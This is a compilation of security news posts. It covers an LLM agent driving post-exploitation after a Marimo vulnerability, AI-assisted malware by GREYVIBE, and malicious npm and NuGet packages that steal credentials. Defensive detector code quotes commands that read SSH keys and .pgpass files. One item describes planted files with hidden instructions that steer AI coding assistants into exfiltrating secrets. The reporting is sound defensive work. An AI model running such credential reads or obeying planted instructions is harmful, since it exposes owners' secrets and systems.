Friday, May 29, 2026

Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection

As threats become more coordinated and faster to execute, endpoint protection has become the proving ground for modern defense. For the seventh consecutive time, Microsoft has been named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. We believe this reflects both the strength of our technology and the trust customers place in Microsoft Defender.

Microsoft Defender delivers industry-leading Endpoint Detection and Response (EDR), powered by global threat intelligence and built for the scale and speed of today’s attacks. For many of our customers, Defender’s endpoint capabilities are the foundation for a coordinated system of defense that spans endpoints, identities, email, apps, cloud, and data.

Bringing these signals together changes what’s possible. It enables earlier detection, stronger prevention, and capabilities like predictive shielding that help stop attacks before they spread. This is the shift underway in security: from isolated tools to a connected system that can see across the environment, understand what’s changing, and take action in real time. It’s what makes the next generation of AI-driven, agentic security possible and helps defenders stay ahead of threats, not just respond to them.

Sustained innovation to stay ahead of changing threats

Over the past year, Microsoft has introduced key advancements to endpoint protection that have empowered defenders to stay ahead of evolving cyberthreats, including:

Proactive defense during attacks: Attack disruption now expands autonomous protection to predicting and blocking an adversary’s next move during active attacks. It acts just in time to harden against some of the most common attacker tactics, such as group policy objects (GPOs), Safeboot, and identity compromise, to stop lateral movement and defend dynamically.

Custom telemetry: With new custom data collection capabilities, Defender makes it easy for security teams to collect specialized data directly within the Defender portal. It allows organizations to extend their endpoint telemetry beyond the 200+ default signals to support tailored detections and advanced hunting scenarios, such as AMSI for hunting over script content and Kerberos for auth-based and network attacks.

Simplified onboarding: To help security teams onboard simply and securely, we’ve built new Defender deployment tools for Windows and Linux, which handle the entire process for you. Just download a single package and it will dynamically adapt to the operating system, take care of prerequisites, and install the latest version of Defender available as needed for older devices that don’t have it already built in. The Defender deployment tools eliminate friction, automate tricky steps, and provide predictability throughout the onboarding journey.

Sovereign-ready protection: Defender enables customers to meet data storage and privacy needs while operating under public, sovereign, hybrid, or disconnected models. Its multi‑tenant architecture enables organizations to balance centralized security visibility with localized control over their data, reflecting a shift from basic compliance to operational governance.

End-to-end security for local AI agents: Microsoft announced agentic endpoint security as a part of A365 to discover, govern, and block AI agents such as OpenClaw and previously unseen applications running locally on endpoints.

Innovations such as these represent the continued commitment to drive the next wave of innovation. Stay tuned for more exciting advancements at Microsoft Build on June 2nd.

Learn more

If you’re not yet taking advantage of Microsoft’s leading endpoint security solution, visit Microsoft Defender for Endpoint and start a free trial today to evaluate our leading endpoint protection platform. 

Are you a regular user of Microsoft Defender for Endpoint? Share your insights on Microsoft Defender for Endpoint and get rewarded with a $25 gift card on Gartner Peer Insights™.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.


Gartner, Magic Quadrant for Endpoint Protection, Deepak Mishra, Evgeny Mirolyubov, Nikul Patel, 26 May 2026.

Gartner is a registered trademark and service mark and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. 

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. 

The post Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection appeared first on Microsoft Security Blog.



from Microsoft Security Blog https://ift.tt/3dz4XhH
via IFTTT

Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit

An unknown threat actor has been observed using a large language model (LLM) agent to conduct post-compromise actions after gaining initial access by exploiting a recently disclosed vulnerability in a publicly accessible Marimo notebook instance.

"The attacker compromised an internet-reachable Marimo notebook via CVE-2026-39987, extracted two cloud credentials from the compromised host, replayed them through a fanned-out egress pool to retrieve an SSH private key from AWS Secrets Manager, and used that key to drive eight short SSH sessions against a downstream SSH bastion server," Sysdig said.

"The bastion phase exfiltrated the schema and full contents of an internal PostgreSQL database in under two minutes."

CVE-2026-39987 refers to a critical pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including 0.20.4. It allows an unauthenticated attacker to execute arbitrary system commands. The issue was addressed in version 0.23.0, released last month.

The security defect has since come under active exploitation, with threat actors using it to initiate manual reconnaissance against honeypot systems and attempt to harvest sensitive data.

The latest activity documented by Sysdig sticks to the same pattern, the primary difference being that an LLM agent was used to drive the post-exploitation activity. The incident, per the cloud security firm, was recorded on May 10, 2026, with the attacker gathering credentials from the environment and then using the harvested AWS access key to perform API calls against AWS Secrets Manager and retrieve an SSH private key.

Minutes later, the threat actor is said to have carried out the first SSH authentication on the SSH bastion server using the retrieved key, followed by launching eight parallel SSH sessions against the downstream server to siphon an internal PostgreSQL database. The end-to-end attack chain lasted a little over an hour.

Sysdig said it uncovered four indicators that an LLM agent was behind the activity. First, the attacker improvised a database dump without any prior knowledge of the schema. Second, a Chinese-language planning comment, "看还能做什么" (translating to "See what else we can do"), leaked directly into the command stream when executing a credential search.

"The database hostname was opaque, with no application identifier on disk and no schema dump pre-staged, yet the chain still landed on a credential table within minutes," Sysdig said. "The attacker no longer needs to see your environment to operate inside it."

The third sign is that every command is designed for machine consumption, with each command separated by a "---" delimiter, along with bounded output captures, disabling the "less" command, and discarding the error stream (stderr) to minimize noise.

Lastly, the value handoffs are obtained from prior tool output. In other words, the manner in which certain values, say, database passwords, were extracted implies an AI agent feeding its own previous output -- running a cat command of the "~/.pgpass" file -- into the next action.

In another instance, a cat command to print the contents of a specific file ("cat ~/.ssh/id_ed25519") is preceded by an ls ("list") command that passes the same file pattern as input ("ls -la ~/.ssh/id_ed25519*") to confirm that the SSH key exists.
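The traits listed above (a "---" delimiter between commands, bounded output, the pager disabled, stderr discarded, a non-English planning comment, and an existence probe feeding the next command) are all observable in a recorded command stream, so a defender can score them. The block below is an added example, not Sysdig's tooling or anything published with the write-up: the regexes, the sample sessions and the three-indicator threshold are assumptions chosen to illustrate the approach.

```python
"""Score a shell command stream for the machine-consumption markers described
above. Added example with constructed sample sessions; not Sysdig's tooling.
The regexes and threshold are assumptions, not published detection logic."""
import re

# One regex per indicator, matched against a single command line.
INDICATORS = {
    "delimiter":      re.compile(r"(?:^|;\s*)echo\s+---"),        # "---" separators between commands
    "stderr_discard": re.compile(r"2>\s*/dev/null"),              # error stream thrown away
    "bounded_output": re.compile(r"\|\s*head\s+-[nc]\s*\d+"),      # output capture capped
    "pager_off":      re.compile(r"\bPAGER=cat\b|--no-pager\b"),  # 'less' disabled
    "cjk_comment":    re.compile(r"#[^\n]*[\u4e00-\u9fff]"),      # planning note leaked into the stream
}
# "ls -la <path>*" followed later by "cat <path>": an existence probe whose
# result is handed to the next action.
EXIST_CHECK = re.compile(r"ls\s+-la\s+(\S+?)\*")
READ_FILE = re.compile(r"(?:^|[;&|]\s*)cat\s+(\S+)")


def score_session(commands, min_distinct=3):
    """Return per-indicator counts for one session plus a verdict.
    min_distinct (assumed threshold): how many different indicators must fire
    before the session is labelled agent-like."""
    counts = {name: 0 for name in INDICATORS}
    counts["probe_then_read"] = 0
    probed = set()
    for cmd in commands:
        for name, rx in INDICATORS.items():
            if rx.search(cmd):
                counts[name] += 1
        m = EXIST_CHECK.search(cmd)
        if m:
            probed.add(m.group(1))
        for path in READ_FILE.findall(cmd):
            if path in probed:
                counts["probe_then_read"] += 1
    distinct = sum(1 for v in counts.values() if v)
    return {"counts": counts, "distinct": distinct, "agent_likely": distinct >= min_distinct}


# Constructed sessions (not captured data) mirroring the traits in the write-up.
AGENT_LIKE = [
    "echo ---; ls -la ~/.ssh/id_ed25519* 2>/dev/null | head -n 20",
    "echo ---; cat ~/.ssh/id_ed25519 2>/dev/null",
    "echo ---; cat ~/.pgpass 2>/dev/null  # 看还能做什么",
    "echo ---; PAGER=cat psql -h db-a1b2.internal -U app -c '\\dt' 2>/dev/null | head -n 100",
]
HUMAN_LIKE = [
    "cd /var/www/app",
    "git status",
    "tail -f logs/app.log",
    "cat README.md",
]

if __name__ == "__main__":
    for label, session in (("agent-like", AGENT_LIKE), ("human-like", HUMAN_LIKE)):
        print(label, score_session(session))
```

Feed it the commands from one bastion session (auditd EXECVE records or a shell audit log, in order) rather than a mixed log; the probe-then-read pairing only means something within a single session, and a human operator can legitimately use `2>/dev/null` or `head`, which is why the verdict requires several distinct indicators rather than any one of them.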

"When a scripted operator builds a per-target playbook and reuses it, the bar to adding a new target is engineering time," Sysdig concluded. "However, an agent operator carries general priors about a class of applications and composes the chain live to best fit its target. Here, the bar becomes inference budget, not playbook authorship."

"The defender-relevant property of an agent-in-the-loop is adaptiveness. A scripted attacker hits a missing file, an unexpected schema, or an authentication failure and either aborts or falls through to a hard-coded fallback. An agent reads the surprise, decides what to try next, and keeps going."

To counter this threat, it's recommended that users update to the latest version of Marimo, audit environments for any publicly-accessible instances, and rotate credentials, API keys, and SSH keys.



from The Hacker News https://ift.tt/L19fnNz
via IFTTT

The Good, the Bad and the Ugly in Cybersecurity – Week 22

The Good | Authorities Dismantle Malicious Hosting Network & Sentence Oregon State Cyberattacker

Web hosting firm Stark Industries was the subject of scrutiny this week from financial crime investigators in the Netherlands (FIOD). Founded just before the 2022 invasion of Ukraine, the firm had deep ties to Russian and Belarusian entities all sanctioned by the EU. Dutch authorities arrested two individuals and seized 800 servers across multiple data centers that actively enabled Russian-based cyberattacks, disinformation operations, and widespread interference campaigns.

Source: FIOD

After being sanctioned in May of last year, Stark Industries shifted their operations to a front company named WorkTitans B.V., which provided hosting services under a new brand, THE.Hosting. This entity allegedly supported the pro-Russian hacktivist syndicate NoName057(16) in executing distributed denial-of-service (DDoS) attacks and indirectly supplied economic resources to restricted organizations.

Collaboration between the DoJ and Romanian law enforcement has resulted in a Romanian national receiving a sentence of 56 months in federal prison for breaching an Oregon state government network.

Catalin Dragomir, operating under the alias “inthematrixl,” pled guilty to aggravated identity theft and obtaining information from a protected computer. Court documents reveal that the 46-year-old gained unauthorized access to the Oregon Department of Emergency Management in June 2021. He subsequently sold this network access to an outside buyer, providing stolen personally identifiable information.

Beyond the Oregon breach, Dragomir also compromised nearly a dozen other victims across the U.S., with total losses exceeding $250,000. Dragomir currently faces five years for computer intrusion, a mandatory two-year term for identity theft, and three years under supervised release. The court has additionally ordered the forfeiture of his cryptocurrency assets.

The Bad | Silent Ransom Group Attackers Dispatch Operatives for In-Person Data Extortion

In-person data theft schemes are on the rise again. In an urgent flash report, the FBI warns that Silent Ransom Group (SRG) is executing social engineering operations against U.S. legal and financial institutions directly at the site of the victim.

Splitting from the Conti syndicate in early 2022, SRG (aka UNC3753, Luna Moth, and Chatty Spider) has historically relied on targeted callback phishing. Lately, the group has escalated its tactics beyond network compromises to include unauthorized physical access.

The attack chain begins with the threat actors posing as internal IT support personnel. Using typosquatted helpdesk domains, the attackers deploy phishing emails or phone calls urging employees to contact them for technical assistance.

Once an employee engages, the attackers attempt to establish a remote desktop session to exfiltrate data. If remote access fails, SRG deliberately escalates the intrusion by sending an operative directly to the victim’s physical location. These unidentified individuals attempt to gain building access to manually insert USB flash drives or external hard drives into the targeted company computers.

Having obtained information, the extortion gang targets the victimized legal and financial organizations. The attackers send ransom demands threatening to publish the stolen proprietary data on leak sites, while simultaneously harassing both employees and external clients by phone to force financial negotiations.

This recent escalation builds upon previous advisories, making it critical for organizations to train staff on how to thoroughly verify digital helpdesk requests and immediately report threats to physical security.

The Ugly | TrapDoor Campaign Launches Cross-Ecosystem Supply Chain Attacks to Steal Credentials

Security researchers have uncovered TrapDoor, a coordinated software supply chain campaign actively distributing credential-stealing malware across npm, PyPI, and Crates.io.

Starting on May 22, 2026, threat actors deployed over 34 malicious packages spanning nearly 400 versions to specifically target developers within the cryptocurrency, decentralized finance, Solana, and AI communities.

Disguised as legitimate local environment and security tooling, TrapDoor works by harvesting a wide range of sensitive developer secrets, SSH keys, cloud credentials, and cryptocurrency wallets.

The operation uses tailored execution methods for each specific registry. Within npm environments, malicious postinstall hooks deploy a shared JavaScript payload that actively validates stolen AWS and GitHub tokens while attempting SSH-based lateral movement.

Rust crates similarly leverage malicious build scripts to search local keystores, encrypting discovered data with a hardcoded XOR key before exfiltrating it to GitHub Gists.

Meanwhile, the Python packages auto-execute during import to download and run remote JavaScript payloads from attacker-controlled domains, granting the operators significant flexibility to modify the malware’s behavior without publishing new registry releases.

TrapDoor playbook showing intended extraction framework of the campaign found in GitHub (Source: Socket)

TrapDoor establishes host persistence utilizing cron jobs, systemd services, and Git hooks. The campaign also targets AI coding assistants by implanting compromised files that contain hidden instructions deliberately designed to trick AI tools into autonomously executing malicious security scans that then discover and exfiltrate local secrets.

Researchers say that threat actors are now actively submitting pull requests containing these poisoned files to major open-source AI projects – an evolving tactic to compromise developer workflows through automated contributor processes and code integrations.

Researchers emphasize that this campaign combines traditional package typosquatting with emerging developer-environment attack vectors. By carefully tailoring package names to mimic legitimate cryptocurrency, AI, and local security workflows, the attackers successfully bypass initial developer scrutiny to execute their multi-ecosystem infiltration. A list of compromised packages can be found here.



from SentinelOne https://ift.tt/VnATQma
via IFTTT

New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks

A previously undocumented threat actor dubbed GREYVIBE has been attributed to ongoing and persistent attacks targeting Ukraine and Ukraine-related entities since at least August 2025.

GREYVIBE, per WithSecure, is assessed to be a Russian-speaking group operating broadly in the Russian time zone, with the activities aligning with Kremlin state interests, specifically when it comes to intelligence gathering efforts aimed at Ukraine in the context of the ongoing Russo-Ukrainian war.

"The group has leveraged multiple attack vectors, including spear-phishing e-mails, fake captcha pages, and fraudulent Ukrainian adult club websites, to deliver malware to a diverse set of victims," WithSecure researcher Mohammad Kazem Hassan Nejad said in an analysis. "Across these campaigns, the group has relied on custom-developed obfuscators, loaders, and malware."

The victimology footprint spans military, government, civilian, and business-related organizations. GREYVIBE, its nation-state-affiliated activity notwithstanding, also shares ties to the broader Russian cybercrime ecosystem through some of its members who are believed to be current or former cybercriminal actors.

In addition, there is evidence indicating that the adversary is relying on generative artificial intelligence (GenAI) and large language models (LLMs) to supercharge its operations. Taken together, WithSecure paints the picture of a "low-to-moderately sophisticated group" that suffers from operational security blunders and employs AI-assisted tooling to augment its malware development efforts.

GREYVIBE has been observed using multiple attack chains against its targets -

  • PhantomMail, which uses spear-phishing emails to distribute links pointing to malicious ZIP or RAR archives hosted on Google Drive and 4sync that contain JavaScript-based loaders to launch a decoy document, and PhantomRelay, a PowerShell-based remote access trojan (RAT) designed to profile the host and run PowerShell scripts and Windows commands.
  • PhantomClick, which uses ClickFix-style fake CAPTCHA pages on bogus domains masquerading as Zoom and LAPAS to trick users into running commands that initiate a PhantomRelay infection chain.
  • PrincessClub, which uses fake Ukrainian adult-club websites to deliver FallSpy on Android and PhantomRelayV1 or LegionRelay on Windows, with subsequent iterations of the lure sites introducing a WebRTC-based live call feature to capture victim audio and video. While FallSpy is an Android spyware capable of harvesting sensitive data from the compromised device, LegionRelay is a lightweight PowerShell-based RAT that supports file enumeration, file exfiltration, screenshot capture, browser data theft, Telegram and WhatsApp data exfiltration, and RDP access setup. PhantomRelayV1 is a variant of PhantomRelay with a custom watchdog persistence mechanism.
  • DroneLink, which uses websites masquerading as charitable foundations supporting the Armed Forces of Ukraine to deliver WireGuard and LegionRelay.
  • Nebo, which uses a FallSpy sample that mimics a Russian-language login screen, likely in an attempt to deceive Ukrainian military personnel into thinking they were accessing a Russian military terminal.

The variety of delivery vectors and tools used in the attacks likely stems from the use of AI platforms, including Ideogram AI, OpenAI ChatGPT, and Google Gemini, to assist with generating images and developing LegionRelay, as well as obfuscation and loader scripts, backend infrastructure, and post-compromise commands.

The cybersecurity company said GREYVIBE's usage of AI serves multiple advantages, including bridging gaps in technical expertise, accelerating the development lifecycle, and reducing reliance on previously known malware or tools that could aid in attribution efforts.

"If an actor can frequently generate, refactor, or replace components of its operational footprint with AI assistance, traditional clustering methods based on stable technical artifacts may become less reliable over time," Nejad said.

That said, the use of AI has also had the side effect of introducing design flaws into LegionRelay, exposing the malware's backend functionality. This is another sign suggesting GREYVIBE may not be a pure nation-state actor, as sophisticated adversaries are unlikely to make such mistakes.

The hacking group's links to the cybercriminal ecosystem are based on multiple factors -

  • Possible access to and use of an ISO builder with suspected ties to the TrickBot gang and UAC-0098
  • Presence of PhantomRelay variants across seemingly unrelated cybercrime activity clusters, such as a Microsoft Teams voice phishing campaign between July 2025 and February 2026, and a KongTuke delivery chain between late February and late March 2026 that used ClickFix to distribute the malware.
  • The upload of early development and test samples to VirusTotal
  • Use of internet slang terms like "letsrollboyos," "totallyunsus," and "cuteuwu" as naming conventions for development artifacts.
  • The deployment of XMRig miner on a small number of LegionRelay-infected machines

"Taken together, we assess with moderate confidence that the group has ties to the broader cybercrime ecosystem, and with low-to-moderate confidence that it involves current or former cybercriminal members," WithSecure said. "The exact nature of their relationship to the Russian state remains unclear, whether such members have been absorbed into a state-backed group, operate independently under state-directed tasking, or have formed a hybrid team."

"The group occupies a grey area between cybercrime and state-affiliated activity, complicating attribution efforts and blurring traditional distinctions between these categories."



from The Hacker News https://ift.tt/SiHA487
via IFTTT

What 2,000 Exposed Vibe-Coded Apps Reveal About the Limits of Most Security Stacks

Shadow AI used to mean employees pasting things they shouldn't into ChatGPT. It now means something bigger: employees building full applications with AI, wiring them into production systems, and publishing them on the open internet. Without Security or IT in the loop.

The artifact moved from a prompt to a product. The risk surface moved with it.

In The Shadow Builders report (get it here), a new category-level investigation covered in May by Axios, WIRED, and VentureBeat, Red Access identified more than 380,000 publicly accessible web assets across the leading vibe-coding platforms.

Roughly 5,000 looked corporate. More than 2,000 of those held sensitive corporate, operational, or personal data - sitting on the open web, deployed without basic access controls, often granting admin access by default to anyone who reached the URL. Spanning six continents and every industry. No exploitation required.

Inside organizations that were passing their audits while these exposures were live.

The new Shadow AI isn't about prompts. It's about products.

Vibe coding - the broader space of AI-driven development platforms where anyone can build a working application by describing what they want - has compressed what used to take engineering teams months into something a non-developer can ship before lunch.

A marketing manager builds a campaign tracker and connects it to the BI tool where the real numbers live. An operations manager builds a vendor-intake form and connects it to the ticketing system. A finance team builds a board-prep dashboard and pulls invoice data into it before Friday. Those applications get connected to sanctioned production systems - CRMs, ERPs, ticketing tools, BI platforms - and frequently published to the open internet, with whatever access controls the builder happened to configure. Often, none.

The people doing this aren't malicious. They are competent employees solving real problems faster than their organization could, doing exactly what the platforms invited them to do. The platforms aren't villains either - they're delivering what their original audience asked for. What hasn't kept pace is the guardrails, technical and behavioral, governing what happens after the build.

This isn't Shadow IT in the old sense. Shadow IT was bounded: when a team bought a Trello account on a corporate card without telling anyone, the data sat inside an unsanctioned SaaS vendor, but identity, audit logs, and a governance surface at least existed. Shadow Builders invert that. The application is custom-built, the data is custom-loaded, the integrations are direct connections to production systems of record, and the artifact is often published on the open internet. The platform underneath may be audited; the application built on it isn't. There is the builder, the platform, and the URL. IT? Mostly not in the room.

Why a mature security stack still misses this

The reflex of a CISO reading the numbers above is to check the stack. EDR is running. DLP is configured. CASB is licensed. Firewall and SSE are in place. Some organizations have added an enterprise browser. Each of those tools is doing what it was designed to do. The category sits in the gaps between them.

EDR sees the browser process, not the build inside it. To an endpoint agent, a Shadow Builder using a vibe-coding platform looks like ordinary, non-malicious browser activity - the same shape of telemetry as someone reading the news. Where modern EDR or an enterprise browser does see deeper, it only does so on devices the organization owns and inside browsers it manages. Personal laptops, contractor machines, BYOD devices, and personal-browser tabs are invisible by definition.

DLP watches enumerated channels. It can flag a user pasting regulated data into a known AI chat. It can't see a vibe-coded application connecting programmatically to a sanctioned BI tool via API, moving data cloud-to-cloud, physically bypassing the endpoint entirely.

CASB was built for Shadow IT - for SaaS vendors with discoverable identities. It can't readily distinguish an unbounded population of custom applications hosted on a vibe-coding platform's subdomains from the platform itself. The whole population tends to register as one approved SaaS vendor.

Firewall and SSE see traffic to the platform's domain but lack the application-as-business-object context. And most SASE/SSE deployments are partial - even the mature ones leave the unmanaged-device problem unsolved.

None of these tools is failing. The category just sits across the gaps the existing architecture leaves between layers, generating fragments of signal that never assemble into a single, governable picture.

Where visibility actually has to live

End-to-end, vibe coding is a web-session event. The build is a browser event. The OAuth grant that ties the new application to a sanctioned enterprise system is a browser event. The data the application is built around moves through the session. The deployment is a browser event - the publish action that turns the build into a live application at a public URL is a click inside the same tab where everything else happened.

Every step happens at the session layer. Not adjacent to it. Inside it.

A control positioned at the session layer, therefore, sees the whole build path - not a fragment of it. The platform used. The corporate systems connected to it, and through what mechanism. The data moving in and out. The publish event that puts the application on the open internet. Attributable to a specific person and a specific application instance, regardless of which browser was used or which network path the traffic took. And, critically, regardless of whether the device is a corporate-issued laptop or a contractor's personal machine.

What to do this week

Four moves. None of them is a technology purchase.

Start with discovery. Ask employees directly what they've built. Most Shadow Builders are doing useful work and aren't hiding anything; the framing matters. A workforce-wide prompt - if you've built a tool using an AI development platform, please tell us about it. We're not auditing. We're inventorying - gets further on the first pass than a policy memo or a tooling deployment.

Then map. For each application surfaced, capture which corporate systems it's connected to, how (OAuth, API key, manual upload - different audit trails), and whether it's publicly reachable. Public reachability is the most actionable signal in the short term.

Establish a sanctioned path. Give Shadow Builders somewhere to tell you. Name the approved platforms, define acceptable data categories, and set a minimum authentication standard. Lower-friction than the alternative, which is them not telling you at all.

And then accept that the work isn't a one-time inventory. Vibe-coded applications keep getting created; the picture you build this month will be incomplete next month. The mature posture is continuous discovery at the layer where the activity actually happens.

The category will keep maturing. Platforms will keep recalibrating defaults. None of those adaptations is finished. The exposure exists in most enterprises right now.

Red Access is the agentless, session-layer security platform built for exactly this - SSE-grade visibility and governance at the session itself, across any browser, any device, including unmanaged ones. Deployable in hours. Request your free audit.




from The Hacker News https://ift.tt/IgUfTrH
via IFTTT

Malicious Sicoob NuGet Steals Banking Credentials as npm Packages Target Cloud Secrets

Cybersecurity researchers have discovered a malicious NuGet package that masquerades as a C# software development kit for Sicoob, one of Brazil's largest cooperative financial systems, to siphon client IDs and PFX certificates.

According to Socket, versions 2.0.0 through 2.0.4 of "Sicoob.Sdk" contain functionality to exfiltrate sensitive information, including PFX certificates that are used to authenticate businesses with the Sicoob banking network in order to automate banking operations, such as processing instant payments and generating dynamic Pix QR codes. The package is estimated to have been downloaded nearly 500 times.

"When a developer instantiates SicoobClient with a client ID, a PFX file path, and a PFX password, the package reads the PFX file from disk, Base64-encodes its contents, and sends the supplied client ID, PFX password, and encoded PFX data to a hardcoded third-party Sentry endpoint," security researcher Kirill Boychenko said.

In addition, the package is designed to capture raw Boleto API responses via a separate Sentry path. Boleto is a popular cash payment method in Brazil for making online and offline purchases. This can potentially expose sensitive transaction details, payment status, amounts, due dates, identifiers, and payer or payee data.

As a result, the stolen data could open the door to severe risks, as it can be abused by the threat actor to impersonate the victim's Sicoob banking API integration, Socket added. Following responsible disclosure, the package has been blocked by NuGet. The profile behind the package, named "sicoob," has also listed 11 other NuGet packages that have collectively racked up about 6,000 downloads.

The application security company also said the package was surfaced by Google Search AI Mode as a legitimate C# library for interacting with Sicoob banking APIs, thereby amplifying the malicious package to unsuspecting developers who may be searching for it.

Another important aspect of the attack is the source-to-package mismatch between the linked GitHub repository and the artifact distributed via NuGet. It's suspected that the GitHub repository is designed to lend a veneer of legitimacy to the operation by keeping it clean, while the malicious data-stealing functionality is introduced only in the package uploaded to the registry.

What's more, the compromise of Sicoob API authentication material can also pose indirect risks to end users, as it could leak downstream financial data or enable payment abuse.

Organizations that have installed "Sicoob.Sdk" are recommended to immediately remove the package, treat PFX material as compromised, replace exposed PFX certificates, rotate PFX passwords, and change or disable affected client IDs where applicable. It's also advised to audit Sicoob authentication and API logs for signs of unusual activity.
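Two of the points above, the hardcoded Sentry endpoint in the shipped binary and the mismatch between the linked GitHub source and the NuGet artifact, can be checked offline before a package is trusted. The Python below is an added example, not Socket's tooling and not code from Sicoob.Sdk: it opens a .nupkg (a zip), reads the .nuspec for the declared repository URL and commit so the artifact can be diffed against the source it claims to come from, lists the binaries actually shipped, and searches them for Sentry DSN-shaped strings, trying both UTF-16 alignments because .NET stores string literals as UTF-16 in the assembly. The package it builds in memory, the id "Example.Sdk", the repository URL and the DSN are all constructed for the demo; the affected version range is the one Socket reports.

```python
"""Offline triage of a NuGet package: declared source vs. shipped binaries.

Added example; not Socket's tooling and not code from Sicoob.Sdk. The .nupkg it
inspects is built in memory below, with a made-up package id and a fake DSN.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Sentry DSN shape: scheme://<public key>@<host>/<project id>
SENTRY_DSN_RE = re.compile(rb"https?://[0-9a-f]{16,}@[A-Za-z0-9.-]+/\d+")

# Inclusive version range Socket reported for Sicoob.Sdk.
AFFECTED = {"sicoob.sdk": ((2, 0, 0), (2, 0, 4))}


def is_affected(package_id: str, version: str) -> bool:
    """True if (package_id, version) falls in a known-malicious range."""
    rng = AFFECTED.get(package_id.lower())
    if not rng:
        return False
    core = re.match(r"\d+(?:\.\d+)*", version)          # drop pre-release/build tags
    parts = tuple(int(p) for p in core.group().split(".")) if core else ()
    parts = (parts + (0, 0, 0))[:3]
    return rng[0] <= parts <= rng[1]


def _string_views(blob: bytes):
    """Yield the raw bytes plus both UTF-16LE alignments re-encoded as UTF-8,
    because .NET keeps string literals as UTF-16 in the assembly's #US heap."""
    yield blob
    for start in (0, 1):
        yield blob[start:].decode("utf-16-le", "ignore").encode("utf-8")


def inspect_nupkg(data: bytes) -> dict:
    """Return declared id/version/repository plus any DSNs found in shipped binaries."""
    report = {"id": None, "version": None, "repository": None, "binaries": [], "dsns": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.endswith(".nuspec"):
                root = ET.fromstring(z.read(name))
                for el in root.iter():                   # match on local name: nuspec is namespaced
                    tag = el.tag.rsplit("}", 1)[-1]
                    if tag == "id":
                        report["id"] = el.text
                    elif tag == "version":
                        report["version"] = el.text
                    elif tag == "repository":
                        report["repository"] = dict(el.attrib)
            elif name.lower().endswith((".dll", ".exe")):
                report["binaries"].append(name)
                for view in _string_views(z.read(name)):
                    report["dsns"].update(m.decode() for m in SENTRY_DSN_RE.findall(view))
    report["dsns"] = sorted(report["dsns"])
    report["affected"] = bool(report["id"] and report["version"]
                              and is_affected(report["id"], report["version"]))
    return report


def build_sample_nupkg() -> bytes:
    """Constructed .nupkg: a clean-looking nuspec and a DLL with an embedded DSN."""
    nuspec = b"""<?xml version="1.0"?>
<package xmlns="http://schemas.microsoft.com/packaging/2013/05/nuspec.xsd">
  <metadata>
    <id>Example.Sdk</id>
    <version>2.0.3</version>
    <repository type="git" url="https://github.com/example/example-sdk" commit="0123abc" />
  </metadata>
</package>"""
    fake_dsn = "https://0123456789abcdef0123456789abcdef@o000000.ingest.example/1234567"
    dll = b"MZ\x90\x00" + b"\x00" * 64 + fake_dsn.encode("utf-16-le") + b"\x00" * 16
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Example.Sdk.nuspec", nuspec)
        z.writestr("lib/netstandard2.0/Example.Sdk.dll", dll)
    return buf.getvalue()


if __name__ == "__main__":
    r = inspect_nupkg(build_sample_nupkg())
    print(f"{r['id']} {r['version']} declared source: {r['repository']}")
    print("shipped binaries:", r["binaries"])
    print("Sentry DSNs found:", r["dsns"])
```

A DSN in a banking SDK is not proof of theft on its own; what matters is that the declared repository contains no such endpoint while the binary does, which is exactly the source-to-package mismatch described above. Run the same check against the build you reproduce from the tagged commit and compare the two reports.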

The development coincides with the discovery of 14 malicious npm packages that typosquat well-known OpenSearch, ElasticSearch, DevOps, and environment-configuration libraries to harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD pipeline secrets from the host environment using a purpose-built credential harvester that's launched through a preinstall hook.

Per the Microsoft Defender Security Research Team, the packages were published by a single threat actor named "vpmdhaj" ("a39155771@gmail.com") on May 28, 2026. The names of the packages are below -

  • @vpmdhaj/devops-tools
  • @vpmdhaj/elastic-helper
  • @vpmdhaj/opensearch-setup
  • @vpmdhaj/search-setup
  • app-config-utility
  • elastic-opensearch-helper
  • env-config-manager
  • opensearch-config-utility
  • opensearch-security-scanner
  • opensearch-setup
  • opensearch-setup-tool
  • search-cluster-setup
  • search-engine-setup
  • vpmdhaj-opensearch-setup

Over the past few days, various software supply chain attack campaigns targeting open-source ecosystems have been reported -

  • 164 malicious npm packages across five scoped namespaces containing a postinstall payload that downloads second-stage JavaScript, spawns it as a detached process, and sends the victim's environment variables ("process.env") to "oob.moika[.]tech/report."
  • 141 malicious npm packages published between May 7 and 27, 2026, that abuse npm as free static hosting for an ad-monetized web proxy targeting students, serving popunder ads to those who land these pages through search results or shared links.
  • A malicious npm package called "forge-jsxy" that's capable of keylogging, clipboard monitoring, .env scanning, shell history exfiltration, host inventory, remote filesystem access, screenshot capture, and cryptocurrency wallet scanning. "Forge-jsxy" is assessed to be a continuation of the "forge-jsx" campaign that came to light late last month.
  • 176 malicious npm packages that employ dependency confusion by using a high version number ("99.99.99") to distribute a postinstall script with capabilities to fingerprint the host and download a platform-specific JavaScript payload, which then conducts additional reconnaissance, exfiltrates credentials and other valuable developer secrets, and downloads and runs a second-stage binary.
